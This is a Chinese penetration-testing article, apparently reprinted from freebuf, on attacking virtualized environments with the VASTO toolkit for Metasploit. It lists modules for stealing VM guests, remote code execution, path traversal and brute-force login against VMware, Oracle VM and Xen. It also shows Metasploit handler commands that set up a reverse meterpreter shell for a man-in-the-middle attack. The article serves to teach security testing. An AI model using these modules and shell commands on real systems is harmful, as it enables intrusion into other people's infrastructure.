科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道应用安全针对虚拟机的渗透测试

针对虚拟机的渗透测试

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

如今虚拟化在各个企业中应用的越来越多,且火热的云计算也依托于此技术。虚拟化技术确实能够使物理资源的利用更加灵活和便捷,那么虚拟机的安全性如何?相比传统架构,是否像传说中的一样安全?

来源:freebuf 2012年11月30日

关键字: 虚拟机 渗透测试

  • 评论
  • 分享微博
  • 分享邮件

如今虚拟化在各个企业中应用的越来越多,且火热的云计算也依托于此技术。虚拟化技术确实能够使物理资源的利用更加灵活和便捷,那么虚拟机的安全性如何?相比传统架构,是否像传说中的一样安全?

什么是虚拟化

虚拟化是指计算机元件在虚拟的基础上而不是真实的基础上运行。虚拟化技术可以扩大硬件的容量,简化软件的重新配置过程。CPU的虚拟化技术可以单CPU模拟多CPU并行,允许一个平台同时运行多个操作系统,并且应用程序都可以在相互独立的空间内运行而互不影响,从而显著提高计算机的工作效率。我们先来看看虚拟机的层次结构图。

虚拟机完全独立于其底层物理硬件。 例如,你可以为虚拟机配置与底层硬件上存在的物理组件完全不同的虚拟组件(例如,CPU、网卡、SCSI 控制器)。 同一物理服务器上的各个虚拟机甚至可以运行不同类型的操作系统(Windows、Linux 等)

针对虚拟机的渗透测试

VASTO是一个专用的虚拟机渗透测试工具,支持VMware, Oracle和Xen,可以与神器Metasploit有很好的结合。使用前需要先解压,然后复制metasploit文件夹下中

VASTO的主要模块如下,功能还是比较强大的

abiquo_guest_stealer – Abiquo guest stealer

abiquo_poison – Abiquo poison

eucalyptus_bouncer – Eucalyptus Bouncer

eucalyptus_poison – Eucalyptus Poison

oraclevm_oravma_fileread – Oracle VM agent remote code execution

vmware_autopwner – VMautopwn

vmware_guest_stealer – VMware Guest Stealer

vmware_login – VMware Login check scanner

vmware_session_rider – VMware Session Rider

vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution

vmware_updatemanager_traversal – Update manager path traversal

vmware_version – VMware products fingerprintervmware_vilurker – VIlurker VIclient attack

vmware_webaccess_portscan – VMware Web Access Relay Port Scanner

xen_login – Xen Login Check Scanner

oracle_oravma_exec – Oracle VM agent remote code execution

vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec

vmware_tomcat_killer – VMware tomcat killer

Versionsscanner Modul:

用于判断VM的版本等信息

Login Scanner Modul:

这个模块可以使用字典尝试暴力登录虚拟机

vilurker module

这个模块原理即利用ettercap等进行中间人攻击,欺骗成功后,当被攻击者(client)访问server时会弹出窗体,若点击即反弹一个meterpreter。

先multi/handler监听

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST <Local Host IP here>

msf exploit(handler) > exploit

欺骗过程如下

返回shell(meterpreter)


    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章